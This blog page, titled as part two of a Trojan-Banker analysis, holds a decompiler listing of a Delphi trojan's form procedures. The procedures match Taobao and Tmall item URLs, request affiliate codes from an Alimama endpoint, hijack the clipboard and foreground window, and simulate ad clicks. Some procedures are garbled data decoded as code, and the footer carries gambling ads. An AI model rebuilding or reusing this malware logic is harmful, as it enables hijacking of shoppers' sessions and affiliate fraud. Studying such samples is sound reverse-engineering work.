004BC9DA E86D04FBFF call 0046CE4C
004BC9DF 8B55F8 mov edx, [ebp-$08]
004BC9E2 8BC6 mov eax, esi

|
004BC9E4 E86BA8F4FF call 00407254
004BC9E9 8B4508 mov eax, [ebp+$08]
004BC9EC 66C7000000 mov word ptr [eax], $0000
004BC9F1 33C0 xor eax, eax
004BC9F3 5A pop edx
004BC9F4 59 pop ecx
004BC9F5 59 pop ecx
004BC9F6 648910 mov fs:[eax], edx
004BC9F9 EB12 jmp 004BCA0D

|
004BC9FB E92880F4FF jmp 00404A28
004BCA00 8B4508 mov eax, [ebp+$08]
004BCA03 66C700FFFF mov word ptr [eax], $FFFF

|
004BCA08 E82B84F4FF call 00404E38

****** END
|
004BCA0D 33C0 xor eax, eax
004BCA0F 5A pop edx
004BCA10 59 pop ecx
004BCA11 59 pop ecx
004BCA12 648910 mov fs:[eax], edx

****** FINALLY
|
004BCA15 6835CA4B00 push $004BCA35
004BCA1A 8D45F8 lea eax, [ebp-$08]

* Reference to object IDispatch
|
004BCA1D 8B15B8114000 mov edx, [$004011B8]
004BCA23 B902000000 mov ecx, $00000002

|
004BCA28 E80B97F4FF call 00406138
004BCA2D C3 ret

|
004BCA2E E9A982F4FF jmp 00404CDC
004BCA33 EBE5 jmp 004BCA1A

****** END
|
004BCA35 5F pop edi
004BCA36 5E pop esi
004BCA37 5B pop ebx
004BCA38 59 pop ecx
004BCA39 59 pop ecx
004BCA3A 5D pop ebp
004BCA3B C20400 ret $0004

*)
end;

procedure Tfrm_SSMoon._PROC_004BA92A(Sender : TObject);
begin
(*
004BA92A 00C0 add al, al
004BA92C 4F dec edi
004BA92D D901 fld dword ptr [ecx]
004BA92F 196116 sbb [ecx+$16], esp
004BA932 0CD3 or al, $D3
004BA934 AF scasd
004BA935 CDD0 int $D0
004BA937 118A3E00C04F adc [edx+$4FC0003E], ecx
004BA93D C9 leave
004BA93E E26E loop +$6E
004BA940 05DF020000 add eax, +$000002DF
004BA945 0000 add [eax], al

*)
end;

procedure Tfrm_SSMoon._PROC_004BA961(Sender : TObject);
begin
(*
004BA961 8BEC mov ebp, esp
004BA963 33C9 xor ecx, ecx
004BA965 51 push ecx
004BA966 51 push ecx
004BA967 51 push ecx
004BA968 51 push ecx
004BA969 51 push ecx
004BA96A 51 push ecx
004BA96B 51 push ecx
004BA96C 53 push ebx
004BA96D 56 push esi
004BA96E 57 push edi
004BA96F 8BF0 mov esi, eax
004BA971 33C0 xor eax, eax
004BA973 55 push ebp
004BA974 6826AA4B00 push $004BAA26

***** TRY
|
004BA979 64FF30 push dword ptr fs:[eax]
004BA97C 648920 mov fs:[eax], esp
004BA97F C645FF01 mov byte ptr [ebp-$01], $01
004BA983 33C0 xor eax, eax
004BA985 55 push ebp

* Possible String Reference to: '?狋艵'
|
004BA986 68F2A94B00 push $004BA9F2

***** TRY
|
004BA98B 64FF30 push dword ptr fs:[eax]
004BA98E 648920 mov fs:[eax], esp
004BA991 833D64DD4C0000 cmp dword ptr [$004CDD64], +$00
004BA998 744A jz 004BA9E4
004BA99A 8D45EC lea eax, [ebp-$14]

|
004BA99D E8AE77F5FF call 00412150
004BA9A2 50 push eax
004BA9A3 683CAA4B00 push $004BAA3C

* Possible String Reference to: 'ClickAD("'
|
004BA9A8 685CAA4B00 push $004BAA5C
004BA9AD 56 push esi

* Possible String Reference to: '");'
|
004BA9AE 6870AA4B00 push $004BAA70
004BA9B3 8D45E4 lea eax, [ebp-$1C]
004BA9B6 BA03000000 mov edx, $00000003

|
004BA9BB E8C8AEF4FF call 00405888
004BA9C0 8B55E4 mov edx, [ebp-$1C]
004BA9C3 8D45E8 lea eax, [ebp-$18]

|
004BA9C6 E891B4F4FF call 00405E5C
004BA9CB 8B45E8 mov eax, [ebp-$18]
004BA9CE 50 push eax
004BA9CF A164DD4C00 mov eax, dword ptr [$004CDD64]
004BA9D4 50 push eax
004BA9D5 8B00 mov eax, [eax]
004BA9D7 FF9010010000 call dword ptr [eax+$0110]

|
004BA9DD E86AC9F4FF call 0040734C
004BA9E2 EB04 jmp 004BA9E8
004BA9E4 C645FF00 mov byte ptr [ebp-$01], $00
004BA9E8 33C0 xor eax, eax
004BA9EA 5A pop edx
004BA9EB 59 pop ecx
004BA9EC 59 pop ecx
004BA9ED 648910 mov fs:[eax], edx
004BA9F0 EB0E jmp 004BAA00

|
004BA9F2 E931A0F4FF jmp 00404A28
004BA9F7 C645FF00 mov byte ptr [ebp-$01], $00

|
004BA9FB E838A4F4FF call 00404E38

****** END
|
004BAA00 33C0 xor eax, eax
004BAA02 5A pop edx
004BAA03 59 pop ecx
004BAA04 59 pop ecx
004BAA05 648910 mov fs:[eax], edx

****** FINALLY
|
004BAA08 682DAA4B00 push $004BAA2D
004BAA0D 8D45E4 lea eax, [ebp-$1C]

|
004BAA10 E8DFAAF4FF call 004054F4
004BAA15 8D45E8 lea eax, [ebp-$18]

|
004BAA18 E8DFB2F4FF call 00405CFC
004BAA1D 8D45EC lea eax, [ebp-$14]

|
004BAA20 E82B77F5FF call 00412150
004BAA25 C3 ret

|
004BAA26 E9B1A2F4FF jmp 00404CDC
004BAA2B EBE0 jmp 004BAA0D

****** END
|
004BAA2D 0FB645FF movzx eax, byte ptr [ebp-$01]
004BAA31 5F pop edi
004BAA32 5E pop esi
004BAA33 5B pop ebx
004BAA34 8BE5 mov esp, ebp
004BAA36 5D pop ebp
004BAA37 C3 ret

*)
end;

procedure Tfrm_SSMoon._PROC_004BAA38(Sender : TObject);
begin
(*
004BAA38 1400 adc al, $00
004BAA3A 0000 add [eax], al

*)
end;

procedure Tfrm_SSMoon._PROC_004BAA95(Sender : TObject);
begin
(*
004BAA95 8BEC mov ebp, esp
004BAA97 33C9 xor ecx, ecx
004BAA99 51 push ecx
004BAA9A 51 push ecx
004BAA9B 51 push ecx
004BAA9C 51 push ecx
004BAA9D 51 push ecx
004BAA9E 51 push ecx
004BAA9F 51 push ecx
004BAAA0 53 push ebx
004BAAA1 56 push esi
004BAAA2 33C0 xor eax, eax
004BAAA4 55 push ebp

* Possible String Reference to: '閟狋脎^[嬪]?
|
004BAAA5 6864AC4B00 push $004BAC64

***** TRY
|
004BAAAA 64FF30 push dword ptr fs:[eax]
004BAAAD 648920 mov fs:[eax], esp
004BAAB0 A178674C00 mov eax, dword ptr [$004C6778]
004BAAB5 833800 cmp dword ptr [eax], +$00
004BAAB8 0F847B010000 jz 004BAC39

* Reference to: user32.GetForegroundWindow()
|
004BAABE E895D7F4FF call 00408258
004BAAC3 8BF0 mov esi, eax
004BAAC5 A154DD4C00 mov eax, dword ptr [$004CDD54]

|
004BAACA E8D14EF9FF call 0044F9A0
004BAACF 50 push eax

* Reference to: user32.SetForegroundWindow()
|
004BAAD0 E873DAF4FF call 00408548
004BAAD5 8D45FC lea eax, [ebp-$04]

|
004BAAD8 E85FC7F4FF call 0040723C
004BAADD 50 push eax
004BAADE 8D4DF8 lea ecx, [ebp-$08]
004BAAE1 A154DD4C00 mov eax, dword ptr [$004CDD54]

* Reference to control webb2 : TWebBrowser
|
004BAAE6 8B8074030000 mov eax, [eax+$0374]
004BAAEC BACB000000 mov edx, $000000CB

* Reference to : TOleControl._PROC_0046CE4C()
|
004BAAF1 E85623FBFF call 0046CE4C
004BAAF6 8B45F8 mov eax, [ebp-$08]
004BAAF9 50 push eax
004BAAFA 8B00 mov eax, [eax]
004BAAFC FF90B0010000 call dword ptr [eax+$01B0]

|
004BAB02 E845C8F4FF call 0040734C
004BAB07 8B45FC mov eax, [ebp-$04]
004BAB0A 50 push eax
004BAB0B 8B00 mov eax, [eax]
004BAB0D FF90EC000000 call dword ptr [eax+$00EC]

|
004BAB13 E834C8F4FF call 0040734C

* Possible String Reference to: '{TAB '
|
004BAB18 687CAC4B00 push $004BAC7C
004BAB1D 8D55F0 lea edx, [ebp-$10]
004BAB20 A154DD4C00 mov eax, dword ptr [$004CDD54]
004BAB25 8B8088030000 mov eax, [eax+$0388]
004BAB2B 8B402C mov eax, [eax+$2C]

|
004BAB2E E8D9F6F4FF call 0040A20C
004BAB33 FF75F0 push dword ptr [ebp-$10]
004BAB36 688CAC4B00 push $004BAC8C
004BAB3B 8D45F4 lea eax, [ebp-$0C]
004BAB3E BA03000000 mov edx, $00000003

|
004BAB43 E840ADF4FF call 00405888
004BAB48 8B45F4 mov eax, [ebp-$0C]

|
004BAB4B E834AEF4FF call 00405984
004BAB50 33D2 xor edx, edx

|
004BAB52 E87932FFFF call 004ADDD0
004BAB57 B201 mov dl, $01

* Reference to class TClipboard
|
004BAB59 A118934300 mov eax, dword ptr [$00439318]

|
004BAB5E E8B599F4FF call 00404518
004BAB63 8BD8 mov ebx, eax
004BAB65 8D55EC lea edx, [ebp-$14]
004BAB68 8BC3 mov eax, ebx

* Reference to : TClipboard._PROC_0043959C()
|
004BAB6A E82DEAF7FF call 0043959C
004BAB6F 8B55EC mov edx, [ebp-$14]
004BAB72 B874DD4C00 mov eax, $004CDD74

|
004BAB77 E8CCA9F4FF call 00405548
004BAB7C 8BC3 mov eax, ebx
004BAB7E 8B10 mov edx, [eax]

* Possible reference to virtual method TClipboard.OFFS_18
|
004BAB80 FF5218 call dword ptr [edx+$18]
004BAB83 8BC3 mov eax, ebx
004BAB85 8B10 mov edx, [eax]

* Possible reference to virtual method TClipboard.OFFS_10
|
004BAB87 FF5210 call dword ptr [edx+$10]
004BAB8A 8B1578674C00 mov edx, [$004C6778]
004BAB90 8B12 mov edx, [edx]
004BAB92 8BC3 mov eax, ebx

* Reference to : TClipboard._PROC_0043961C()
|
004BAB94 E883EAF7FF call 0043961C

* Possible String Reference to: '^v'
|
004BAB99 B890AC4B00 mov eax, $004BAC90
004BAB9E 33D2 xor edx, edx

|
004BABA0 E82B32FFFF call 004ADDD0
004BABA5 8BC3 mov eax, ebx
004BABA7 8B10 mov edx, [eax]

* Possible reference to virtual method TClipboard.OFFS_14
|
004BABA9 FF5214 call dword ptr [edx+$14]
004BABAC 8BC3 mov eax, ebx

|
004BABAE E89599F4FF call 00404548

* Possible String Reference to: '{TAB '
|
004BABB3 687CAC4B00 push $004BAC7C
004BABB8 8D55E4 lea edx, [ebp-$1C]
004BABBB A154DD4C00 mov eax, dword ptr [$004CDD54]
004BABC0 8B8088030000 mov eax, [eax+$0388]
004BABC6 8B4030 mov eax, [eax+$30]

|
004BABC9 E83EF6F4FF call 0040A20C
004BABCE FF75E4 push dword ptr [ebp-$1C]
004BABD1 688CAC4B00 push $004BAC8C
004BABD6 8D45E8 lea eax, [ebp-$18]
004BABD9 BA03000000 mov edx, $00000003

|
004BABDE E8A5ACF4FF call 00405888
004BABE3 8B45E8 mov eax, [ebp-$18]

|
004BABE6 E899ADF4FF call 00405984
004BABEB 33D2 xor edx, edx

|
004BABED E8DE31FFFF call 004ADDD0
004BABF2 B020 mov al, $20

|
004BABF4 E87BFEFFFF call 004BAA74

* Reference to: kernel32.GetTickCount()
|
004BABF9 E8C2D0F4FF call 00407CC0
004BABFE 8BD8 mov ebx, eax

* Reference to: kernel32.GetTickCount()
|
004BAC00 E8BBD0F4FF call 00407CC0
004BAC05 33D2 xor edx, edx
004BAC07 52 push edx
004BAC08 50 push eax
004BAC09 8BC3 mov eax, ebx
004BAC0B 99 cdq
004BAC0C 290424 sub dword ptr [esp], eax
004BAC0F 19542404 sbb [esp+$04], edx
004BAC13 58 pop eax
004BAC14 5A pop edx
004BAC15 83FA00 cmp edx, +$00
004BAC18 7509 jnz 004BAC23
004BAC1A 3DE8030000 cmp eax, $000003E8
004BAC1F 7604 jbe 004BAC25
004BAC21 EB10 jmp 004BAC33
004BAC23 7F0E jnle 004BAC33
004BAC25 A12C664C00 mov eax, dword ptr [$004C662C]
004BAC2A 8B00 mov eax, [eax]

|
004BAC2C E857B7FAFF call 00466388
004BAC31 EBCD jmp 004BAC00
004BAC33 56 push esi

* Reference to: user32.SetForegroundWindow()
|
004BAC34 E80FD9F4FF call 00408548
004BAC39 33C0 xor eax, eax
004BAC3B 5A pop edx
004BAC3C 59 pop ecx
004BAC3D 59 pop ecx
004BAC3E 648910 mov fs:[eax], edx

****** FINALLY
|

* Possible String Reference to: '^[嬪]?
|
004BAC41 686BAC4B00 push $004BAC6B
004BAC46 8D45E4 lea eax, [ebp-$1C]
004BAC49 BA05000000 mov edx, $00000005

|
004BAC4E E8C5A8F4FF call 00405518
004BAC53 8D45F8 lea eax, [ebp-$08]

|
004BAC56 E8E1C5F4FF call 0040723C
004BAC5B 8D45FC lea eax, [ebp-$04]

|
004BAC5E E8D9C5F4FF call 0040723C
004BAC63 C3 ret

|
004BAC64 E973A0F4FF jmp 00404CDC
004BAC69 EBDB jmp 004BAC46

****** END
|
004BAC6B 5E pop esi
004BAC6C 5B pop ebx
004BAC6D 8BE5 mov esp, ebp
004BAC6F 5D pop ebp
004BAC70 C3 ret

*)
end;

procedure Tfrm_SSMoon._PROC_004BACE1(Sender : TObject);
begin
(*
004BACE1 EA048B1285 jmp $85128B04
004BACE6 D27E1B sar byte ptr [esi+$1B], cl
004BACE9 BE01000000 mov esi, $00000001
004BACEE 0FB64C37FF movzx ecx, byte ptr [edi+esi-$01]
004BACF3 80C1D0 add cl, $D0
004BACF6 80E90A sub cl, $0A
004BACF9 7205 jb 004BAD00
004BACFB 33C0 xor eax, eax
004BACFD 5F pop edi
004BACFE 5E pop esi
004BACFF C3 ret

004BAD00 46 inc esi
004BAD01 4A dec edx
004BAD02 75EA jnz 004BACEE
004BAD04 5F pop edi
004BAD05 5E pop esi
004BAD06 C3 ret

*)
end;

procedure Tfrm_SSMoon._PROC_004BAD08(Sender : TObject);
begin
(*
004BAD08 53 push ebx
004BAD09 8BD8 mov ebx, eax
004BAD0B 8BD3 mov edx, ebx

* Possible String Reference to: 'mm_'
|
004BAD0D B83CAD4B00 mov eax, $004BAD3C

|
004BAD12 E8B9ADF4FF call 00405AD0
004BAD17 85C0 test eax, eax
004BAD19 7E10 jle 004BAD2B
004BAD1B 8BD3 mov edx, ebx

* Possible String Reference to: '_0_0'
|
004BAD1D B848AD4B00 mov eax, $004BAD48

|
004BAD22 E8A9ADF4FF call 00405AD0
004BAD27 85C0 test eax, eax
004BAD29 7F04 jnle 004BAD2F
004BAD2B 33C0 xor eax, eax
004BAD2D 5B pop ebx
004BAD2E C3 ret

004BAD2F B001 mov al, $01
004BAD31 5B pop ebx
004BAD32 C3 ret

*)
end;

procedure Tfrm_SSMoon._PROC_004BAD51(Sender : TObject);
begin
(*
004BAD51 8BEC mov ebp, esp
004BAD53 83C4B0 add esp, -$50
004BAD56 53 push ebx
004BAD57 56 push esi
004BAD58 57 push edi
004BAD59 33DB xor ebx, ebx
004BAD5B 895DB0 mov [ebp-$50], ebx
004BAD5E 895DB4 mov [ebp-$4C], ebx
004BAD61 895DB8 mov [ebp-$48], ebx
004BAD64 895DBC mov [ebp-$44], ebx
004BAD67 895DD0 mov [ebp-$30], ebx
004BAD6A 895DFC mov [ebp-$04], ebx
004BAD6D 895DF8 mov [ebp-$08], ebx
004BAD70 895DF4 mov [ebp-$0C], ebx
004BAD73 895DF0 mov [ebp-$10], ebx
004BAD76 894DE8 mov [ebp-$18], ecx
004BAD79 8955EC mov [ebp-$14], edx
004BAD7C 8BF0 mov esi, eax
004BAD7E 33C0 xor eax, eax
004BAD80 55 push ebp
004BAD81 6892B14B00 push $004BB192

***** TRY
|
004BAD86 64FF30 push dword ptr fs:[eax]
004BAD89 648920 mov fs:[eax], esp
004BAD8C 8B45E8 mov eax, [ebp-$18]

|
004BAD8F E860A7F4FF call 004054F4
004BAD94 8BD6 mov edx, esi

* Possible String Reference to: 'mm_'
|
004BAD96 B8A8B14B00 mov eax, $004BB1A8

|
004BAD9B E830ADF4FF call 00405AD0
004BADA0 8BD8 mov ebx, eax
004BADA2 85DB test ebx, ebx
004BADA4 7E3B jle 004BADE1
004BADA6 8BD6 mov edx, esi

* Possible String Reference to: '_0_0'
|
004BADA8 B8B4B14B00 mov eax, $004BB1B4

|
004BADAD E81EADF4FF call 00405AD0
004BADB2 8BF8 mov edi, eax
004BADB4 85FF test edi, edi
004BADB6 0F8EA6030000 jle 004BB162
004BADBC 8D45F4 lea eax, [ebp-$0C]
004BADBF 50 push eax
004BADC0 8BCF mov ecx, edi
004BADC2 2BCB sub ecx, ebx
004BADC4 83E903 sub ecx, +$03
004BADC7 8D5303 lea edx, [ebx+$03]
004BADCA 8BC6 mov eax, esi

|
004BADCC E81BACF4FF call 004059EC
004BADD1 8B45F4 mov eax, [ebp-$0C]

|
004BADD4 E8BBFEFFFF call 004BAC94
004BADD9 84C0 test al, al
004BADDB 0F8581030000 jnz 004BB162
004BADE1 A154DD4C00 mov eax, dword ptr [$004CDD54]
004BADE6 8B8088030000 mov eax, [eax+$0388]
004BADEC 8B4018 mov eax, [eax+$18]
004BADEF 8B10 mov edx, [eax]
004BADF1 FF5214 call dword ptr [edx+$14]
004BADF4 85C0 test eax, eax
004BADF6 0F8E66030000 jle 004BB162
004BADFC 8D45F8 lea eax, [ebp-$08]
004BADFF 8BD6 mov edx, esi

|
004BAE01 E886A7F4FF call 0040558C
004BAE06 8BD6 mov edx, esi

* Possible String Reference to: 'item.tmall.com/item.htm?id='
|
004BAE08 B8C4B14B00 mov eax, $004BB1C4

|
004BAE0D E8BEACF4FF call 00405AD0
004BAE12 85C0 test eax, eax
004BAE14 7F34 jnle 004BAE4A
004BAE16 8BD6 mov edx, esi

* Possible String Reference to: 'item.tmall.com/auction/item_detail.
| htm?item_num_id='
|
004BAE18 B8E8B14B00 mov eax, $004BB1E8

|
004BAE1D E8AEACF4FF call 00405AD0
004BAE22 85C0 test eax, eax
004BAE24 7F24 jnle 004BAE4A
004BAE26 8BD6 mov edx, esi

* Possible String Reference to: 'item.taobao.com/item.htm?id='
|
004BAE28 B824B24B00 mov eax, $004BB224

|
004BAE2D E89EACF4FF call 00405AD0
004BAE32 85C0 test eax, eax
004BAE34 7F14 jnle 004BAE4A
004BAE36 8BD6 mov edx, esi

* Possible String Reference to: 'item.taobao.com/auction/item_detail
| .htm?item_num_id='
|
004BAE38 B84CB24B00 mov eax, $004BB24C

|
004BAE3D E88EACF4FF call 00405AD0
004BAE42 85C0 test eax, eax
004BAE44 0F8E18030000 jle 004BB162
004BAE4A 8BD6 mov edx, esi
004BAE4C B88CB24B00 mov eax, $004BB28C

|
004BAE51 E87AACF4FF call 00405AD0
004BAE56 8BD8 mov ebx, eax
004BAE58 85DB test ebx, ebx
004BAE5A 7522 jnz 004BAE7E
004BAE5C 8BDE mov ebx, esi
004BAE5E 85DB test ebx, ebx
004BAE60 7405 jz 004BAE67
004BAE62 83EB04 sub ebx, +$04
004BAE65 8B1B mov ebx, [ebx]
004BAE67 8D45F8 lea eax, [ebp-$08]
004BAE6A 50 push eax
004BAE6B 8BCB mov ecx, ebx
004BAE6D 83E907 sub ecx, +$07
004BAE70 BA08000000 mov edx, $00000008
004BAE75 8BC6 mov eax, esi

|
004BAE77 E870ABF4FF call 004059EC
004BAE7C EB15 jmp 004BAE93
004BAE7E 8D45F8 lea eax, [ebp-$08]
004BAE81 50 push eax
004BAE82 8BCB mov ecx, ebx
004BAE84 83E908 sub ecx, +$08
004BAE87 BA08000000 mov edx, $00000008
004BAE8C 8BC6 mov eax, esi

|
004BAE8E E859ABF4FF call 004059EC
004BAE93 8D55C0 lea edx, [ebp-$40]
004BAE96 8B45F8 mov eax, [ebp-$08]

|
004BAE99 E80E85FFFF call 004B33AC
004BAE9E 8D45C0 lea eax, [ebp-$40]
004BAEA1 8D55D0 lea edx, [ebp-$30]

|
004BAEA4 E87B85FFFF call 004B3424
004BAEA9 8B55D0 mov edx, [ebp-$30]
004BAEAC A154DD4C00 mov eax, dword ptr [$004CDD54]
004BAEB1 8B8088030000 mov eax, [eax+$0388]
004BAEB7 8B4014 mov eax, [eax+$14]
004BAEBA 8B08 mov ecx, [eax]
004BAEBC FF5154 call dword ptr [ecx+$54]
004BAEBF 8BD8 mov ebx, eax
004BAEC1 83FBFF cmp ebx, -$01
004BAEC4 0F851F020000 jnz 004BB0E9
004BAECA 8B55F8 mov edx, [ebp-$08]
004BAECD B898B24B00 mov eax, $004BB298

|
004BAED2 E8F9ABF4FF call 00405AD0
004BAED7 8BF8 mov edi, eax
004BAED9 85FF test edi, edi
004BAEDB 0F8E81020000 jle 004BB162
004BAEE1 8B45F8 mov eax, [ebp-$08]
004BAEE4 8945D4 mov [ebp-$2C], eax
004BAEE7 837DD400 cmp dword ptr [ebp-$2C], +$00
004BAEEB 740B jz 004BAEF8
004BAEED 8B45D4 mov eax, [ebp-$2C]
004BAEF0 83E804 sub eax, +$04
004BAEF3 8B00 mov eax, [eax]
004BAEF5 8945D4 mov [ebp-$2C], eax
004BAEF8 8D45F0 lea eax, [ebp-$10]
004BAEFB 50 push eax
004BAEFC 8B4DD4 mov ecx, [ebp-$2C]
004BAEFF 2BCB sub ecx, ebx
004BAF01 8D5701 lea edx, [edi+$01]
004BAF04 8B45F8 mov eax, [ebp-$08]

|
004BAF07 E8E0AAF4FF call 004059EC
004BAF0C 837DF000 cmp dword ptr [ebp-$10], +$00
004BAF10 0F844C020000 jz 004BB162
004BAF16 8B45F0 mov eax, [ebp-$10]

|
004BAF19 E8B6FDFFFF call 004BACD4
004BAF1E 84C0 test al, al
004BAF20 0F843C020000 jz 004BB162
004BAF26 833D64DD4C0000 cmp dword ptr [$004CDD64], +$00
004BAF2D 0F842F020000 jz 004BB162
004BAF33 B868DD4C00 mov eax, $004CDD68
004BAF38 8B55F8 mov edx, [ebp-$08]

|
004BAF3B E808A6F4FF call 00405548
004BAF40 B201 mov dl, $01

* Reference to class TStringList
|
004BAF42 A1A8AA4100 mov eax, dword ptr [$0041AAA8]

|
004BAF47 E8CC95F4FF call 00404518
004BAF4C 8945E4 mov [ebp-$1C], eax
004BAF4F B201 mov dl, $01

* Reference to class TStringList
|
004BAF51 A1A8AA4100 mov eax, dword ptr [$0041AAA8]

|
004BAF56 E8BD95F4FF call 00404518
004BAF5B 8945E0 mov [ebp-$20], eax
004BAF5E 8D45BC lea eax, [ebp-$44]
004BAF61 8B4DF0 mov ecx, [ebp-$10]

* Possible String Reference to: 'auction_id='
|
004BAF64 BAA4B24B00 mov edx, $004BB2A4

|
004BAF69 E89EA8F4FF call 0040580C
004BAF6E 8B55BC mov edx, [ebp-$44]
004BAF71 8B45E4 mov eax, [ebp-$1C]
004BAF74 8B08 mov ecx, [eax]

* Possible reference to virtual method TStringList.OFFS_38
|
004BAF76 FF5138 call dword ptr [ecx+$38]
004BAF79 8D45B8 lea eax, [ebp-$48]
004BAF7C 50 push eax
004BAF7D A154DD4C00 mov eax, dword ptr [$004CDD54]

* Reference to control IdHTTP : TIdHTTP
|
004BAF82 8B806C030000 mov eax, [eax+$036C]
004BAF88 8B4DE4 mov ecx, [ebp-$1C]

* Possible String Reference to: 'http://taoke.alimama.com/spreader/g
| en_auction_code.htm'
|
004BAF8B BAB8B24B00 mov edx, $004BB2B8

|
004BAF90 E80BA9FDFF call 004958A0
004BAF95 8B55B8 mov edx, [ebp-$48]
004BAF98 8B45E0 mov eax, [ebp-$20]
004BAF9B 8B08 mov ecx, [eax]

* Possible reference to virtual method TStringList.OFFS_2C
|
004BAF9D FF512C call dword ptr [ecx+$2C]
004BAFA0 8B45E0 mov eax, [ebp-$20]
004BAFA3 8B10 mov edx, [eax]

* Possible reference to virtual method TStringList.OFFS_14
|
004BAFA5 FF5214 call dword ptr [edx+$14]
004BAFA8 48 dec eax
004BAFA9 85C0 test eax, eax
004BAFAB 0F8C26010000 jl 004BB0D7
004BAFB1 40 inc eax
004BAFB2 8945D8 mov [ebp-$28], eax
004BAFB5 C745DC00000000 mov dword ptr [ebp-$24], $0000

【上篇】linux 下安装JDK
【下篇】汇编学习（一）

作者: azalea

该日志由 azalea 于11年前发表在综合分类下，最后更新于 2013年06月18日.
转载请注明: Trojan-Banker.Win32.Banker (2) | 学步园 +复制链接

抱歉!评论已关闭.

返回首页

（其他合作也可洽谈）

必威体育

必威电竞

学步园